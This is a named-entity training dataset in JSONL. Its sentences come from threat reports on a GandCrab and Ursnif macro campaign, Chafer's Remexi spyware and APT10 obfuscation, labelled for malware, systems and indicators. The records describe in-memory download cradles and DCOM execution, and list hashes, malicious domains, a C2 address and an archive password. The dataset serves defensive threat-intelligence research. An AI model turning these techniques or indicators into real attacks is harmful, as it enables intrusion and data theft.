{"text": "If the DownloadString method is located it will contact the hard coded C2 requesting a file , which is downloaded and then invoked ( highlighted in blue ) .", "spans": {"System: DownloadString": [[7, 21]], "System: C2": [[71, 73]]}, "info": {"id": "aptner_train_000133", "source": "aptner_train"}}
{"text": "It should be noted that because the requested resource is being stored as a string and executed , this all occurs in memory .", "spans": {}, "info": {"id": "aptner_train_000134", "source": "aptner_train"}}
{"text": "Additional Analysis of the downloaded string is provided in the Gandcrab cradle section below .", "spans": {"Malware: Gandcrab": [[64, 72]]}, "info": {"id": "aptner_train_000135", "source": "aptner_train"}}
{"text": "The loop then looks for the method name DownloadData , and if located will download a resource from a second C2 .", "spans": {"System: DownloadData": [[40, 52]], "System: C2": [[109, 111]]}, "info": {"id": "aptner_train_000136", "source": "aptner_train"}}
{"text": "This request is then stored in the CommonApplicationData directory ( C:\\ProgramData in Vista and later ) as the hard coded file name ( highlighted in green ) .", "spans": {}, "info": {"id": "aptner_train_000137", "source": "aptner_train"}}
{"text": "The script will utilize the hard coded DCOM object C08AFD90-F2A1-11D1-8455-00A0C91F3880 , which is the ClassID for the ShellBrowserWindow .", "spans": {"System: DCOM": [[39, 43]], "System: ShellBrowserWindow": [[119, 137]]}, "info": {"id": "aptner_train_000138", "source": "aptner_train"}}
{"text": "A previous blog post by enigma0x3 , detailed how this CLSID can be leveraged to instantiate the ShellBrowserWindow object and call the ShellExecute method , which is the same approach that was taken by the attackers .", "spans": {"System: ShellBrowserWindow": [[96, 114]], "System: ShellExecute": [[135, 147]]}, "info": {"id": "aptner_train_000139", "source": "aptner_train"}}
{"text": "This approach has also been used in different Empire modules .", "spans": {"System: Empire": [[46, 52]]}, "info": {"id": "aptner_train_000140", "source": "aptner_train"}}
{"text": "The payloads that are downloaded in the above steps are then executed on the system .", "spans": {}, "info": {"id": "aptner_train_000141", "source": "aptner_train"}}
{"text": "The first payload that is downloaded via the DownloadString method highlighted above , is a PowerShell one-liner that uses an IF statement to evaluate the architecture of the compromised system , and then downloads a additional payload from pastebin.com .", "spans": {"System: DownloadString": [[45, 59]], "System: PowerShell": [[92, 102]], "Indicator: pastebin.com": [[241, 253]]}, "info": {"id": "aptner_train_000142", "source": "aptner_train"}}
{"text": "This additional payload is then executed in memory .", "spans": {}, "info": {"id": "aptner_train_000143", "source": "aptner_train"}}
{"text": "The image below depicts the contents of the o402ek2m.php file .", "spans": {"Indicator: o402ek2m.php": [[44, 56]]}, "info": {"id": "aptner_train_000144", "source": "aptner_train"}}
{"text": "It should be noted that the contents of o402ek2m.php were updated by the attackers to reference different pastebin uploads throughout this campaign .", "spans": {"Indicator: o402ek2m.php": [[40, 52]]}, "info": {"id": "aptner_train_000145", "source": "aptner_train"}}
{"text": "Also updated was the function name that is invoked , in the example below it was CJOJFNUWNQKRTLLTMCVDCKFGG , however this was dynamically changed to match the name of the function that would be present in pastebin file that was being downloaded .", "spans": {}, "info": {"id": "aptner_train_000146", "source": "aptner_train"}}
{"text": "Once the raw contents of the pastebin.com post were downloaded , that data would also be executed in memory .", "spans": {"Indicator: pastebin.com": [[29, 41]]}, "info": {"id": "aptner_train_000147", "source": "aptner_train"}}
{"text": "In the variants that were obtained during this campaign the file contained a PowerShell script that was approximately 2800 lines .", "spans": {"System: PowerShell": [[77, 87]]}, "info": {"id": "aptner_train_000148", "source": "aptner_train"}}
{"text": "This PowerShell script is a version of the Empire Invoke-PSInject module , with very few modifications .", "spans": {"System: PowerShell": [[5, 15]], "System: Empire Invoke-PSInject": [[43, 65]]}, "info": {"id": "aptner_train_000149", "source": "aptner_train"}}
{"text": "The majority if the modifications are of removing comments and renaming variables .", "spans": {}, "info": {"id": "aptner_train_000150", "source": "aptner_train"}}
{"text": "The script will take an embedded PE file that has been base64 encoded and inject that into the current PowerShell process .", "spans": {"System: PE": [[33, 35]], "System: PowerShell": [[103, 113]]}, "info": {"id": "aptner_train_000151", "source": "aptner_train"}}
{"text": "The image below is the main function that is being called which in turns calls the function responsible for injecting the embedded PE file .", "spans": {"System: embedded PE file": [[122, 138]]}, "info": {"id": "aptner_train_000152", "source": "aptner_train"}}
{"text": "The base64 encoded PE file that can be seen in line 2760 of the image above is a GandCrab Variant .", "spans": {"System: PE": [[19, 21]], "Malware: GandCrab": [[81, 89]]}, "info": {"id": "aptner_train_000153", "source": "aptner_train"}}
{"text": "This variant ( the metadata for which is listed below ) is Gandcrab version 5.0.4 .", "spans": {"Malware: Gandcrab": [[59, 67]]}, "info": {"id": "aptner_train_000154", "source": "aptner_train"}}
{"text": "krab5.dll : 0f270db9ab9361e20058b8c6129bf30e d6c53d9341dda1252ada3861898840be4d669abae2b983ab9bf5259b84de7525 , Mon Oct 29 17:39:23 2018 UTC . krab5.text : 019bc7edf8c2896754fdbdbc2ddae4ec . krab5.rdata : d6ed79624f7af19ba90f51379b7f31e4 . krab5.data : 1ec7b57b01d0c46b628a991555fc90f0 . krab5.rsrc : 89b7e19270b2a5563c301b84b28e423f . krab5.reloc : 685c3c775f65bffceccc1598ff7c2e59 .", "spans": {"Indicator: krab5.dll": [[0, 9]], "Indicator: 0f270db9ab9361e20058b8c6129bf30e": [[12, 44]], "Indicator: d6c53d9341dda1252ada3861898840be4d669abae2b983ab9bf5259b84de7525": [[45, 109]], "Indicator: krab5.text": [[143, 153]], "Indicator: 019bc7edf8c2896754fdbdbc2ddae4ec": [[156, 188]], "Indicator: krab5.rdata": [[191, 202]], "Indicator: d6ed79624f7af19ba90f51379b7f31e4": [[205, 237]], "Indicator: krab5.data": [[240, 250]], "Indicator: 1ec7b57b01d0c46b628a991555fc90f0": [[253, 285]], "Indicator: krab5.rsrc": [[288, 298]], "Indicator: 89b7e19270b2a5563c301b84b28e423f": [[301, 333]], "Indicator: krab5.reloc": [[336, 347]], "Indicator: 685c3c775f65bffceccc1598ff7c2e59": [[350, 382]]}, "info": {"id": "aptner_train_000155", "source": "aptner_train"}}
{"text": "The second payload , downloaded via the DownloadData method , is a Ursnif executable .", "spans": {"System: DownloadData": [[40, 52]], "Malware: Ursnif": [[67, 73]]}, "info": {"id": "aptner_train_000156", "source": "aptner_train"}}
{"text": "In this instance it is saved to the C:\\ProgramData directory with a pseudo random name .", "spans": {}, "info": {"id": "aptner_train_000157", "source": "aptner_train"}}
{"text": "It should be noted that the file name was changed throughout this campaign .", "spans": {}, "info": {"id": "aptner_train_000158", "source": "aptner_train"}}
{"text": "Once executed the Ursnif sample will conduct the typical actions observed in Ursnif samples , like credential harvesting , gathering system and process information , and deploying additional malware samples .", "spans": {"Malware: Ursnif": [[18, 24], [77, 83]]}, "info": {"id": "aptner_train_000159", "source": "aptner_train"}}
{"text": "The information for this specific sample is listed below .", "spans": {}, "info": {"id": "aptner_train_000160", "source": "aptner_train"}}
{"text": "However , numerous Ursnif variants were hosted on the bevendbrec.com site during this campaign .", "spans": {"Malware: Ursnif": [[19, 25]], "Indicator: bevendbrec.com": [[54, 68]]}, "info": {"id": "aptner_train_000161", "source": "aptner_train"}}
{"text": "Carbon Black was able to discover approximately 120 different Ursnif variants that were being hosted from the domains iscondisth.com and bevendbrec.com . irongreen.exe : 404d25e3a18bda19a238f77270837198 c064f6f047a4e39014a29c8c95526c3fe90d7bcea5ef0b8f21ea306c27713d1f , Sun Dec 18 11:04:31 2011 UTC . irongreen.text : 85aa9117c381eae3d181ab63daab335e . irongreen.rdata : 3e1c774bc4e0ffc2271075e621aa3f3d . irongreen.data : 6c389e5e301564f65dcad4811dbded8b . irongreen.rsrc : efba623cc62ffd0ccbf7f3fbf6264905 . irongreen.reloc : 6cf46599a57a6cbc5d18fbb2883620ce .", "spans": {"Organization: Carbon Black": [[0, 12]], "Malware: Ursnif": [[62, 68]], "Indicator: iscondisth.com": [[118, 132]], "Indicator: bevendbrec.com": [[137, 151]], "Indicator: irongreen.exe": [[154, 167]], "Indicator: 404d25e3a18bda19a238f77270837198": [[170, 202]], "Indicator: c064f6f047a4e39014a29c8c95526c3fe90d7bcea5ef0b8f21ea306c27713d1f": [[203, 267]], "Indicator: irongreen.text": [[301, 315]], "Indicator: 85aa9117c381eae3d181ab63daab335e": [[318, 350]], "Indicator: irongreen.rdata": [[353, 368]], "Indicator: 3e1c774bc4e0ffc2271075e621aa3f3d": [[371, 403]], "Indicator: irongreen.data": [[406, 420]], "Indicator: 6c389e5e301564f65dcad4811dbded8b": [[423, 455]], "Indicator: irongreen.rsrc": [[458, 472]], "Indicator: efba623cc62ffd0ccbf7f3fbf6264905": [[475, 507]], "Indicator: irongreen.reloc": [[510, 525]], "Indicator: 6cf46599a57a6cbc5d18fbb2883620ce": [[528, 560]]}, "info": {"id": "aptner_train_000162", "source": "aptner_train"}}
{"text": "While researching this campaign approximately 180 variants were located in the wild .", "spans": {}, "info": {"id": "aptner_train_000163", "source": "aptner_train"}}
{"text": "Using the VirusTotal Graph functionality these variants could be organized into several groups that were commonly associated by either metadata or document structures like macros or embedded image files ( depicted in the image below ) .", "spans": {"System: VirusTotal Graph": [[10, 26]]}, "info": {"id": "aptner_train_000164", "source": "aptner_train"}}
{"text": "The image below highlights the nodes associated with the samples analyzed in this report .", "spans": {}, "info": {"id": "aptner_train_000165", "source": "aptner_train"}}
{"text": "The graph can also be viewed in the VTGraph Console for additional exploration .", "spans": {"System: VTGraph Console": [[36, 51]]}, "info": {"id": "aptner_train_000166", "source": "aptner_train"}}
{"text": "The graph highlights the at least 3 different variants of Ursnif that were being hosted on the bevendbrec.com site .", "spans": {"Malware: Ursnif": [[58, 64]], "Indicator: bevendbrec.com": [[95, 109]]}, "info": {"id": "aptner_train_000167", "source": "aptner_train"}}
{"text": "The Ursnif variants were primarily grouped by C2 infrastructure .", "spans": {"Malware: Ursnif": [[4, 10]], "System: C2": [[46, 48]]}, "info": {"id": "aptner_train_000168", "source": "aptner_train"}}
{"text": "The large grouping on the right of the diagram are direct variants of the sample referenced in this write up .", "spans": {}, "info": {"id": "aptner_train_000169", "source": "aptner_train"}}
{"text": "Samples in this grouping were all hosted on sites that were called by the second stage .", "spans": {}, "info": {"id": "aptner_train_000170", "source": "aptner_train"}}
{"text": "The samples had minor changes , and were presumably changed by the attackers to avoid detection by hash .", "spans": {}, "info": {"id": "aptner_train_000171", "source": "aptner_train"}}
{"text": "Word Dropper Variant cc5a14ff026ee593d7d25f213715b73833e6b9cf71091317121a009d5ad7fc36 7ce3d9fc86396fac9865607594395e94 Word Dropper Variant 28a8d6b8a0cdcb25d098e403cc8b6dcb855cb591f0b54c2e3363b5c580d92b28 74c7aed44680100e984251ce2cdbdbc6 Word Dropper Variant facbc2cb089668197ca3968a3433b6f4826430c13f7d1c75b44667307c67dfe3 10f308d78adda567d4589803ce18cc9b Word Dropper Variant e714a5147335245c386b105bb7494a8b190b6a737ba28f029561efe48105cd11 f279d0f04874327b85221697d99de321 Word Dropper Variant 56c46ef3d5bd544fa35f6e336d3be93cf36e72d0273fa1dbc915979f2d883e9d bc1b322e7efc19417ab0d0524ccb9ff2 .", "spans": {"Malware: Word Dropper": [[0, 12], [119, 131], [238, 250], [357, 369], [476, 488]], "Indicator: cc5a14ff026ee593d7d25f213715b73833e6b9cf71091317121a009d5ad7fc36": [[21, 85]], "Indicator: 7ce3d9fc86396fac9865607594395e94": [[86, 118]], "Indicator: 28a8d6b8a0cdcb25d098e403cc8b6dcb855cb591f0b54c2e3363b5c580d92b28": [[140, 204]], "Indicator: 74c7aed44680100e984251ce2cdbdbc6": [[205, 237]], "Indicator: facbc2cb089668197ca3968a3433b6f4826430c13f7d1c75b44667307c67dfe3": [[259, 323]], "Indicator: 10f308d78adda567d4589803ce18cc9b": [[324, 356]], "Indicator: e714a5147335245c386b105bb7494a8b190b6a737ba28f029561efe48105cd11": [[378, 442]], "Indicator: f279d0f04874327b85221697d99de321": [[443, 475]], "Indicator: 56c46ef3d5bd544fa35f6e336d3be93cf36e72d0273fa1dbc915979f2d883e9d": [[497, 561]], "Indicator: bc1b322e7efc19417ab0d0524ccb9ff2": [[562, 594]]}, "info": {"id": "aptner_train_000172", "source": "aptner_train"}}
{"text": "Ursnif Variant 446ffd272c79554a19b5f4299327fb74b8ff457681d10571caa6eea51ec406b0 ea7e1650031c92b7377788f05926034e Ursnif Variant 42636f3185c9e398958aad272d983c8b8b1409df4ce93f1f8f608e190290f56d 377cd85d8d68fc58976a123aa151c5e0 Ursnif Variant 24b2141c1134ef14f33a38c58342b6573940c5460d03a2945fafac36e32e6889 b73cbffea8094cfa18b067d9568c53e7 Ursnif Variant e53b0a60c238c45019089bdf7f16d5f47b7ba15ca2c918e385c41f0c2076eb52 24fe5a6196e32749cd030ab51824cabe Ursnif Variant 4c8de1713f830819e8354b653fd19a5cafd0bc8fa3145eedf555f24261c874de 589734cb60aa515599c687539c520049 .", "spans": {"Malware: Ursnif": [[0, 6], [113, 119], [226, 232], [339, 345], [452, 458]], "Indicator: 446ffd272c79554a19b5f4299327fb74b8ff457681d10571caa6eea51ec406b0": [[15, 79]], "Indicator: ea7e1650031c92b7377788f05926034e": [[80, 112]], "Indicator: 42636f3185c9e398958aad272d983c8b8b1409df4ce93f1f8f608e190290f56d": [[128, 192]], "Indicator: 377cd85d8d68fc58976a123aa151c5e0": [[193, 225]], "Indicator: 24b2141c1134ef14f33a38c58342b6573940c5460d03a2945fafac36e32e6889": [[241, 305]], "Indicator: b73cbffea8094cfa18b067d9568c53e7": [[306, 338]], "Indicator: e53b0a60c238c45019089bdf7f16d5f47b7ba15ca2c918e385c41f0c2076eb52": [[354, 418]], "Indicator: 24fe5a6196e32749cd030ab51824cabe": [[419, 451]], "Indicator: 4c8de1713f830819e8354b653fd19a5cafd0bc8fa3145eedf555f24261c874de": [[467, 531]], "Indicator: 589734cb60aa515599c687539c520049": [[532, 564]]}, "info": {"id": "aptner_train_000173", "source": "aptner_train"}}
{"text": "GandCrab Variant d6c53d9341dda1252ada3861898840be4d669abae2b983ab9bf5259b84de7525 ce1ee671fe5246a9c40b624ef97e4de1 GandCrab Variant aca0b96126c813b0d29d6fbff9175f8ca62ff2ec6eed83bff76a73ae717cfcb8 07f955796a252771861c8e0db06b1f01 GandCrab Variant 8cd45f8c8f2ed0109db6a64f9945f3dcb8a780f65c76aedded7b8af95e6dc7ec 4fcd0d13ea669a83a749ae5bfb098ca2 GandCrab Variant 933210a9d19b25e0711ae88eece1ba06bb035a01ab2880cc707ff55bdd3b8dd0 8ec87fd3ea777fa8d5160dc957e6683e GandCrab Variant e564e87958b3e76bc9bfeb5bed773b7a17f3a82f84872acdbb609aa43a9cd776 c7d5077960882259b85c01fd41c49ffd .", "spans": {"Malware: GandCrab": [[0, 8], [115, 123], [230, 238], [345, 353], [460, 468]], "Indicator: d6c53d9341dda1252ada3861898840be4d669abae2b983ab9bf5259b84de7525": [[17, 81]], "Indicator: ce1ee671fe5246a9c40b624ef97e4de1": [[82, 114]], "Indicator: aca0b96126c813b0d29d6fbff9175f8ca62ff2ec6eed83bff76a73ae717cfcb8": [[132, 196]], "Indicator: 07f955796a252771861c8e0db06b1f01": [[197, 229]], "Indicator: 8cd45f8c8f2ed0109db6a64f9945f3dcb8a780f65c76aedded7b8af95e6dc7ec": [[247, 311]], "Indicator: 4fcd0d13ea669a83a749ae5bfb098ca2": [[312, 344]], "Indicator: 933210a9d19b25e0711ae88eece1ba06bb035a01ab2880cc707ff55bdd3b8dd0": [[362, 426]], "Indicator: 8ec87fd3ea777fa8d5160dc957e6683e": [[427, 459]], "Indicator: e564e87958b3e76bc9bfeb5bed773b7a17f3a82f84872acdbb609aa43a9cd776": [[477, 541]], "Indicator: c7d5077960882259b85c01fd41c49ffd": [[542, 574]]}, "info": {"id": "aptner_train_000174", "source": "aptner_train"}}
{"text": "Chafer used Remexi malware to spy on Iran-based foreign diplomatic entities Throughout the autumn of 2018 we analyzed a long-standing (and still active at that time) cyber-espionage campaign that was primarily targeting foreign diplomatic entities based in Iran .", "spans": {"Organization: Chafer": [[0, 6]], "Malware: Remexi": [[12, 18]]}, "info": {"id": "aptner_train_000175", "source": "aptner_train"}}
{"text": "The attackers were using an improved version of Remexi in what the victimology suggests might be a domestic cyber-espionage operation .", "spans": {"Malware: Remexi": [[48, 54]]}, "info": {"id": "aptner_train_000176", "source": "aptner_train"}}
{"text": "This malware has previously been associated with an APT actor that Symantec calls Chafer .", "spans": {"Organization: Symantec": [[67, 75]], "Organization: Chafer": [[82, 88]]}, "info": {"id": "aptner_train_000177", "source": "aptner_train"}}
{"text": "The malware can exfiltrate keystrokes, screenshots, browser-related data like cookies and history, decrypted when possible .", "spans": {}, "info": {"id": "aptner_train_000178", "source": "aptner_train"}}
{"text": "The attackers rely heavily on Microsoft technologies on both the client and server sides: the Trojan uses standard Windows utilities like Microsoft Background Intelligent Transfer Service (BITS ) bitsadmin.exe to receive commands and exfiltrate data .", "spans": {"Organization: Microsoft": [[30, 39]], "System: Trojan": [[94, 100]], "System: Windows": [[115, 122]], "System: Microsoft Background Intelligent Transfer Service": [[138, 187]], "System: (BITS": [[188, 193]], "Indicator: bitsadmin.exe": [[196, 209]]}, "info": {"id": "aptner_train_000179", "source": "aptner_train"}}
{"text": "Its C2 is based on IIS using .asp technology to handle the victims’ HTTP requests .", "spans": {"System: C2": [[4, 6]], "System: IIS": [[19, 22]], "Indicator: .asp": [[29, 33]]}, "info": {"id": "aptner_train_000180", "source": "aptner_train"}}
{"text": "Remexi developers use the C programming language and GCC compiler on Windows in the MinGW environment .", "spans": {"Malware: Remexi": [[0, 6]], "System: C": [[26, 27]], "System: GCC": [[53, 56]], "System: Windows": [[69, 76]], "System: MinGW": [[84, 89]]}, "info": {"id": "aptner_train_000181", "source": "aptner_train"}}
{"text": "They most likely used the Qt Creator IDE in a Windows environment .", "spans": {"System: Qt Creator IDE": [[26, 40]], "System: Windows": [[46, 53]]}, "info": {"id": "aptner_train_000182", "source": "aptner_train"}}
{"text": "The malware utilizes several persistence mechanisms including scheduled tasks, Userinit and Run registry keys in the HKLM hive .", "spans": {"System: HKLM": [[117, 121]]}, "info": {"id": "aptner_train_000183", "source": "aptner_train"}}
{"text": "XOR and RC4 encryption is used with quite long unique keys for different samples .", "spans": {}, "info": {"id": "aptner_train_000184", "source": "aptner_train"}}
{"text": "Among all these random keys once the word “salamati” was also used, which means “health” in Farsi .", "spans": {}, "info": {"id": "aptner_train_000185", "source": "aptner_train"}}
{"text": "Kaspersky Lab products detect the malware described in this report as Trojan.Win32.Remexi and Trojan.Win32.Agent .", "spans": {"Organization: Kaspersky Lab": [[0, 13]], "Indicator: Trojan.Win32.Remexi": [[70, 89]], "Indicator: Trojan.Win32.Agent": [[94, 112]]}, "info": {"id": "aptner_train_000186", "source": "aptner_train"}}
{"text": "This blogpost is based in our original report shared with our APT Intelligence Reporting customers last November 2018 .", "spans": {}, "info": {"id": "aptner_train_000187", "source": "aptner_train"}}
{"text": "The main tool used in this campaign is an updated version of the Remexi malware, publicly reported by Symantec back in 2015 .", "spans": {"Malware: Remexi": [[65, 71]], "Organization: Symantec": [[102, 110]]}, "info": {"id": "aptner_train_000188", "source": "aptner_train"}}
{"text": "The newest module’s compilation timestamp is March 2018 .", "spans": {}, "info": {"id": "aptner_train_000189", "source": "aptner_train"}}
{"text": "The developers used GCC compiler on Windows in the MinGW environment .", "spans": {"System: GCC": [[20, 23]], "System: Windows": [[36, 43]], "System: MinGW": [[51, 56]]}, "info": {"id": "aptner_train_000190", "source": "aptner_train"}}
{"text": "Inside the binaries the compiler left references to the names of the C source file modules used: operation_reg.c , thread_command.c and thread_upload.c .", "spans": {"System: C": [[69, 70]], "Indicator: operation_reg.c": [[97, 112]], "Indicator: thread_command.c": [[115, 131]], "Indicator: thread_upload.c": [[136, 151]]}, "info": {"id": "aptner_train_000191", "source": "aptner_train"}}
{"text": "Like mentioned in modules file names the malware consists of several working threads dedicated to different tasks, including C2 command parsing and data exfiltration .", "spans": {"System: C2": [[125, 127]]}, "info": {"id": "aptner_train_000192", "source": "aptner_train"}}
{"text": "For both the receiving of C2 commands and exfiltration, Remexi uses the Microsoft Background Intelligent Transfer Service (BITS ) mechanism to communicate with the C2 over HTTP .", "spans": {"System: C2": [[26, 28], [164, 166]], "Malware: Remexi": [[56, 62]], "System: Microsoft Background Intelligent Transfer Service": [[72, 121]], "System: (BITS": [[122, 127]]}, "info": {"id": "aptner_train_000193", "source": "aptner_train"}}
{"text": "So far, our telemetry hasn’t provided any concrete evidence that shows us how the Remexi malware spread .", "spans": {"Malware: Remexi": [[82, 88]]}, "info": {"id": "aptner_train_000194", "source": "aptner_train"}}
{"text": "However, we think it’s worth mentioning that for one victim we found a correlation between the execution of Remexi´s main module and the execution of an AutoIt script compiled as PE , which we believe may have dropped the malware .", "spans": {"System: AutoIt": [[153, 159]], "System: PE": [[179, 181]]}, "info": {"id": "aptner_train_000195", "source": "aptner_train"}}
{"text": "This dropper used an FTP with hardcoded credentials to receive its payload .", "spans": {}, "info": {"id": "aptner_train_000196", "source": "aptner_train"}}
{"text": "FTP server was not accessible any more at the time of our analysis .", "spans": {}, "info": {"id": "aptner_train_000197", "source": "aptner_train"}}
{"text": "Remexi boasts features that allow it to gather keystrokes, take screenshots of Windows of interest (as defined in its configuration), steal credentials, logons and the browser history, and execute remote commands .", "spans": {"Malware: Remexi": [[0, 6]], "System: Windows": [[79, 86]]}, "info": {"id": "aptner_train_000198", "source": "aptner_train"}}
{"text": "Encryption consists of XOR with a hardcoded key for its configuration and RC4 with a predefined password for encrypting the victim’s data .", "spans": {}, "info": {"id": "aptner_train_000199", "source": "aptner_train"}}
{"text": "Remexi includes different modules that it deploys in its working directory, including configuration decryption and parsing, launching victim activity logging in a separate module, and seven threads for various espionage and auxiliary functions .", "spans": {"Malware: Remexi": [[0, 6]]}, "info": {"id": "aptner_train_000200", "source": "aptner_train"}}
{"text": "The Remexi developers seem to rely on legitimate Microsoft utilities, which we enumerate in the table below： extract.exe Deploys modules from the .cab file into the working Event Cache directory, bitsadmin.exe Fetches files from the C2 server to parse and execute commands .", "spans": {"Organization: Microsoft": [[49, 58]], "Indicator: extract.exe": [[109, 120]], "Indicator: .cab": [[146, 150]], "Indicator: bitsadmin.exe": [[196, 209]], "System: C2": [[233, 235]]}, "info": {"id": "aptner_train_000201", "source": "aptner_train"}}
{"text": "Send exfiltrated data, taskkill.exe Ends working cycle of modules .", "spans": {"Indicator: taskkill.exe": [[23, 35]]}, "info": {"id": "aptner_train_000202", "source": "aptner_train"}}
{"text": "Persistence modules are based on scheduled tasks and system registry .", "spans": {}, "info": {"id": "aptner_train_000203", "source": "aptner_train"}}
{"text": "Mechanisms vary for different OS versions .", "spans": {}, "info": {"id": "aptner_train_000204", "source": "aptner_train"}}
{"text": "In the case of old Windows versions like XP , main module events.exe runs an edited XPTask.vbs Microsoft sample script to create a weekly scheduled task for itself .", "spans": {"System: Windows": [[19, 26]], "System: XP": [[41, 43]], "Indicator: events.exe": [[58, 68]], "Indicator: XPTask.vbs": [[84, 94]], "Organization: Microsoft": [[95, 104]]}, "info": {"id": "aptner_train_000205", "source": "aptner_train"}}
{"text": "For newer operating systems, events.exe creates task.xml .", "spans": {"Indicator: events.exe": [[29, 39]], "Indicator: task.xml": [[48, 56]]}, "info": {"id": "aptner_train_000206", "source": "aptner_train"}}
{"text": "To decrypt the configuration data, the malware uses XOR with 25-character keys such as “waEHleblxiQjoxFJQaIMLdHKz” that are different for every sample .", "spans": {}, "info": {"id": "aptner_train_000207", "source": "aptner_train"}}
{"text": "RC4 file encryption relies on the Windows 32 CryptoAPI , using the provided value’s MD5 hash as an initial vector .", "spans": {"System: Windows": [[34, 41]], "System: CryptoAPI": [[45, 54]]}, "info": {"id": "aptner_train_000208", "source": "aptner_train"}}
{"text": "Among all these random keys once the word “salamati” was also used, which means “health” in Farsi .", "spans": {}, "info": {"id": "aptner_train_000209", "source": "aptner_train"}}
{"text": "Config.ini is the file where the malware stores its encrypted configuration data.List of files to send to C2 using bitsadmin.exe from the dedicated thread: upLog.txt , upSCRLog.txt , upSpecial.txt , upFile.txt , upMSLog.txt . http://108.61.189.174 control server HTTP URL .", "spans": {"Indicator: Config.ini": [[0, 10]], "System: C2": [[106, 108]], "Indicator: bitsadmin.exe": [[115, 128]], "Indicator: upLog.txt": [[156, 165]], "Indicator: upSCRLog.txt": [[168, 180]], "Indicator: upSpecial.txt": [[183, 196]], "Indicator: upFile.txt": [[199, 209]], "Indicator: upMSLog.txt": [[212, 223]], "Indicator: http://108.61.189.174": [[226, 247]]}, "info": {"id": "aptner_train_000210", "source": "aptner_train"}}
{"text": "KtJvOXulgibfiHk is the password for uploaded zip archives .", "spans": {}, "info": {"id": "aptner_train_000211", "source": "aptner_train"}}
{"text": "One of the malware threads checks in an infinite loop if the mouse button was pressed and then also increments the integer iterator infinitely .", "spans": {}, "info": {"id": "aptner_train_000212", "source": "aptner_train"}}
{"text": "If the mouse hooking function registers a button hit, it lets the screenshotting thread know about it through a global variable .", "spans": {}, "info": {"id": "aptner_train_000213", "source": "aptner_train"}}
{"text": "After that, it checks if the iterator divided by (captureScreenTimeOut/captureActiveWindowTimeOut) has a remainder of 0 .", "spans": {}, "info": {"id": "aptner_train_000214", "source": "aptner_train"}}
{"text": "In that case, it takes a screenshot .", "spans": {}, "info": {"id": "aptner_train_000215", "source": "aptner_train"}}
{"text": "events.exe : b1fa803c19aa9f193b67232c9893ea57574a2055791b3de9f836411ce000ce31 , c981273c32b581de824e1fd66a19a281 , GCC compiler in MinGW environment version 2.24, I386 Windows GUI EXE .", "spans": {"Indicator: events.exe": [[0, 10]], "Indicator: b1fa803c19aa9f193b67232c9893ea57574a2055791b3de9f836411ce000ce31": [[13, 77]], "Indicator: c981273c32b581de824e1fd66a19a281": [[80, 112]], "System: GCC": [[115, 118]], "System: MinGW": [[131, 136]], "System: Windows": [[168, 175]], "System: GUI": [[176, 179]], "System: EXE": [[180, 183]]}, "info": {"id": "aptner_train_000216", "source": "aptner_train"}}
{"text": "After checking that the malware is not already installed , it unpacks HCK.cab using the Microsoft standard utility expand.exe .", "spans": {"Indicator: HCK.cab": [[70, 77]], "Organization: Microsoft": [[88, 97]], "Indicator: expand.exe": [[115, 125]]}, "info": {"id": "aptner_train_000217", "source": "aptner_train"}}
{"text": "Splitter.exe : a77f9e441415dbc8a20ad66d4d00ae606faab370ffaee5604e93ed484983d3ff , 1ff40e79d673461cd33bd8b68f8bb5b8 , 2017.08.06 11:32:36 (GMT), I386 Windows Console EXE .", "spans": {"Indicator: Splitter.exe": [[0, 12]], "Indicator: a77f9e441415dbc8a20ad66d4d00ae606faab370ffaee5604e93ed484983d3ff": [[15, 79]], "Indicator: 1ff40e79d673461cd33bd8b68f8bb5b8": [[82, 114]], "System: Windows": [[149, 156]], "System: Console": [[157, 164]], "System: EXE": [[165, 168]]}, "info": {"id": "aptner_train_000218", "source": "aptner_train"}}
{"text": "Exfiltration is done through the bitsadmin.exe utility .", "spans": {"Indicator: bitsadmin.exe": [[33, 46]]}, "info": {"id": "aptner_train_000219", "source": "aptner_train"}}
{"text": "The BITS mechanism has existed since Windows XP up to the current Windows 10 versions and was developed to create download/upload jobs, mostly to update the OS itself .", "spans": {"System: BITS": [[4, 8]], "System: Windows XP": [[37, 47]], "System: Windows 10": [[66, 76]]}, "info": {"id": "aptner_train_000220", "source": "aptner_train"}}
{"text": "The vast majority of the users targeted by this new variant of Remexi appear to have Iranian IP addresses .", "spans": {"Malware: Remexi": [[63, 69]]}, "info": {"id": "aptner_train_000221", "source": "aptner_train"}}
{"text": "Some of these appear to be foreign diplomatic entities based in the country .", "spans": {}, "info": {"id": "aptner_train_000222", "source": "aptner_train"}}
{"text": "The Remexi malware has been associated with an APT actor called Chafer by Symantec .", "spans": {"Malware: Remexi": [[4, 10]], "Organization: Chafer": [[64, 70]], "Organization: Symantec": [[74, 82]]}, "info": {"id": "aptner_train_000223", "source": "aptner_train"}}
{"text": "One of the human-readable encryption keys used is “salamati” .", "spans": {}, "info": {"id": "aptner_train_000224", "source": "aptner_train"}}
{"text": "This is probably the Latin spelling for the word “health” in Farsi .", "spans": {}, "info": {"id": "aptner_train_000225", "source": "aptner_train"}}
{"text": "Among the artifacts related to malware authors, we found in the binaries a .pdb path containing the Windows user name “Mohamadreza New” .", "spans": {"Indicator: .pdb": [[75, 79]], "System: Windows": [[100, 107]]}, "info": {"id": "aptner_train_000226", "source": "aptner_train"}}
{"text": "Interestingly, the FBI website for wanted cybercriminals includes two Iranians called Mohammad Reza, although this could be a common name or even a false flag .", "spans": {"Organization: FBI": [[19, 22]]}, "info": {"id": "aptner_train_000227", "source": "aptner_train"}}
{"text": "Activity of the Chafer APT group has been observed since at least 2015 , but based on things like compilation timestamps and C&C registration, it’s possible they have been active for even longer .", "spans": {"Organization: Chafer": [[16, 22]]}, "info": {"id": "aptner_train_000228", "source": "aptner_train"}}
{"text": "Defeating Compiler-Level Obfuscations Used in APT10 Malware .", "spans": {"Organization: APT10": [[46, 51]]}, "info": {"id": "aptner_train_000229", "source": "aptner_train"}}
{"text": "The Carbon Black Threat Analysis Unit ( TAU )", "spans": {"Organization: The Carbon Black Threat Analysis Unit": [[0, 37]], "Organization: TAU": [[40, 43]]}, "info": {"id": "aptner_train_000230", "source": "aptner_train"}}
{"text": "recently analyzed a series of malware samples that utilized compiler-level obfuscations .", "spans": {}, "info": {"id": "aptner_train_000231", "source": "aptner_train"}}
{"text": "For example ,", "spans": {}, "info": {"id": "aptner_train_000232", "source": "aptner_train"}}
{"text": "opaque predicates were applied to Turla mosquito and APT10 ANEL .", "spans": {"Organization: Turla": [[34, 39]], "Malware: mosquito": [[40, 48]], "Organization: APT10": [[53, 58]], "Malware: ANEL": [[59, 63]]}, "info": {"id": "aptner_train_000233", "source": "aptner_train"}}
